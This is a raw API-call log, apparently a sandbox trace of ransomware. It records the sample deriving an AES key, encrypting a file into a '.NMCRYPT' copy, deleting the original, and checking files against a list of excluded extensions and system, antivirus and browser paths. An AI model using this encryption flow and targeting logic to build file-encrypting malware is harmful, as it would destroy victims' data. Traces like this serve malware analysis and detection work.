CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.288] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.288] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0166.288] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0166.288] CryptCreateHash (in: hProv=0x8e3aa0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448fc | out: phHash=0x1d4448fc) returned 1 [0166.288] CryptHashData (hHash=0x9ad5b8, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0166.288] CryptDeriveKey (in: hProv=0x8e3aa0, Algid=0x6610, hBaseData=0x9ad5b8, dwFlags=0x4, phKey=0x1d444900 | out: phKey=0x1d444900*=0x9ad138) returned 1 [0166.288] CryptSetKeyParam (hKey=0x9ad138, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0166.288] CryptSetKeyParam (hKey=0x9ad138, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0166.288] wcslen (_String="\\\\?\\") returned 0x4 [0166.289] CryptDuplicateKey (in: hKey=0x9ad138, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad4b8) returned 1 [0166.289] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stucco.gif.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\stucco.gif.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c4 [0166.289] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stucco.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\stucco.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15b0 [0166.289] GetFileSizeEx (in: hFile=0x15b0, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=1864) returned 1 [0166.290] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.290] GetLastError () returned 0x0 [0166.290] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.322] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.322] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.322] GetLastError () returned 0x0 [0166.322] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.322] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.322] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.322] GetLastError () returned 0x0 [0166.322] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.322] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.322] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.322] GetLastError () returned 0x0 [0166.322] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.322] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.322] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.322] GetLastError () returned 0x0 [0166.322] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.322] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.322] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.322] GetLastError () returned 0x0 [0166.322] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.323] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.323] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.323] GetLastError () returned 0x0 [0166.323] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.323] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x48, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x48, lpOverlapped=0x0) returned 1 [0166.323] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x48, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x50) returned 1 [0166.323] GetLastError () returned 0x0 [0166.323] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x50, lpOverlapped=0x0) returned 1 [0166.323] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0166.323] WriteFile (in: hFile=0x15c4, lpBuffer=0x2891f68*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0166.323] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stucco.gif") returned 1 [0166.323] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stucco.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\stucco.gif")) returned 0 [0166.324] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stucco.gif" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stucco.gif") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stucco.gif" [0166.324] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stucco.gif" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery") returned 1 [0166.324] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXFD39.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxfd39.tmp")) returned 0xfd39 [0166.325] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stucco.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\stucco.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXFD39.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxfd39.tmp"), dwFlags=0x1) returned 0 [0166.325] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXFD39.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxfd39.tmp")) returned 1 [0166.325] CryptDestroyKey (hKey=0x9ad4b8) returned 1 [0166.325] wcslen (_String="OK") returned 0x2 [0166.326] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.326] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.326] CryptDestroyKey (hKey=0x9ad138) returned 1 [0166.326] CryptDestroyHash (hHash=0x9ad5b8) returned 1 [0166.326] CryptReleaseContext (hProv=0x8e3aa0, dwFlags=0x0) returned 1 [0166.326] PathMatchSpecW (pszFile="Tanspecks.jpg", pszSpec="*NMCRYPT") returned 0 [0166.326] PathMatchSpecW (pszFile="Tanspecks.jpg", pszSpec="*Recovers your files.html") returned 0 [0166.326] PathMatchSpecW (pszFile="Tanspecks.jpg", pszSpec="*.exe") returned 0 [0166.326] PathMatchSpecW (pszFile="Tanspecks.jpg", pszSpec="*.dll") returned 0 [0166.326] PathMatchSpecW (pszFile="Tanspecks.jpg", pszSpec="*.lnk") returned 0 [0166.326] PathMatchSpecW (pszFile="Tanspecks.jpg", pszSpec="*.bat") returned 0 [0166.326] PathMatchSpecW (pszFile="Tanspecks.jpg", pszSpec="*.ini") returned 0 [0166.326] PathMatchSpecW (pszFile="Tanspecks.jpg", pszSpec="*.msi") returned 0 [0166.326] PathMatchSpecW (pszFile="Tanspecks.jpg", pszSpec="*.scf") returned 0 [0166.326] PathMatchSpecW (pszFile="Tanspecks.jpg", pszSpec="*pagefile.sys*") returned 0 [0166.326] PathMatchSpecW (pszFile="Tanspecks.jpg", pszSpec="*NTUSER.DAT*") returned 0 [0166.326] PathMatchSpecW (pszFile="Tanspecks.jpg", pszSpec="*AppData*") returned 0 [0166.326] PathMatchSpecW (pszFile="Tanspecks.jpg", pszSpec="*\\winrar\\*") returned 0 [0166.326] PathMatchSpecW (pszFile="Tanspecks.jpg", pszSpec="*\\Internet Explorer\\*") returned 0 [0166.326] PathMatchSpecW (pszFile="Tanspecks.jpg", pszSpec="*\\java\\*") returned 0 [0166.326] PathMatchSpecW (pszFile="Tanspecks.jpg", pszSpec="*\\TeamViewer\\*") returned 0 [0166.326] PathMatchSpecW (pszFile="Tanspecks.jpg", pszSpec="*\\windows\\*") returned 0 [0166.326] PathMatchSpecW (pszFile="Tanspecks.jpg", pszSpec="*\\ESET\\*") returned 0 [0166.326] PathMatchSpecW (pszFile="Tanspecks.jpg", pszSpec="*\\AVG\\*") returned 0 [0166.326] PathMatchSpecW (pszFile="Tanspecks.jpg", pszSpec="*\\AVIRA\\*") returned 0 [0166.326] PathMatchSpecW (pszFile="Tanspecks.jpg", pszSpec="*\\AVAST Software\\*") returned 0 [0166.326] PathMatchSpecW (pszFile="Tanspecks.jpg", pszSpec="*Atheros*") returned 0 [0166.326] PathMatchSpecW (pszFile="Tanspecks.jpg", pszSpec="*Realtek*") returned 0 [0166.326] PathMatchSpecW (pszFile="Tanspecks.jpg", pszSpec="*bootmgr*") returned 0 [0166.326] PathMatchSpecW (pszFile="Tanspecks.jpg", pszSpec="*boot*") returned 0 [0166.326] PathMatchSpecW (pszFile="Tanspecks.jpg", pszSpec="*boot*") returned 0 [0166.326] PathMatchSpecW (pszFile="Tanspecks.jpg", pszSpec="*CONFIG.SYS*") returned 0 [0166.326] PathMatchSpecW (pszFile="Tanspecks.jpg", pszSpec="*IO.SYS*") returned 0 [0166.326] PathMatchSpecW (pszFile="Tanspecks.jpg", pszSpec="*MSDOS.SYS*") returned 0 [0166.326] PathMatchSpecW (pszFile="Tanspecks.jpg", pszSpec="*NTDETECT.COM*") returned 0 [0166.326] PathMatchSpecW (pszFile="Tanspecks.jpg", pszSpec="*ntldr*") returned 0 [0166.326] PathMatchSpecW (pszFile="Tanspecks.jpg", pszSpec="*chrome*") returned 0 [0166.326] PathMatchSpecW (pszFile="Tanspecks.jpg", pszSpec="*opera*") returned 0 [0166.326] PathMatchSpecW (pszFile="Tanspecks.jpg", pszSpec="*firefox*") returned 0 [0166.326] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Tanspecks.jpg", pszSpec="*") returned 1 [0166.326] strlen (_Str="NMoreira") returned 0x8 [0166.326] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.326] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.326] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.326] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.326] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.326] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.327] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.328] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.328] 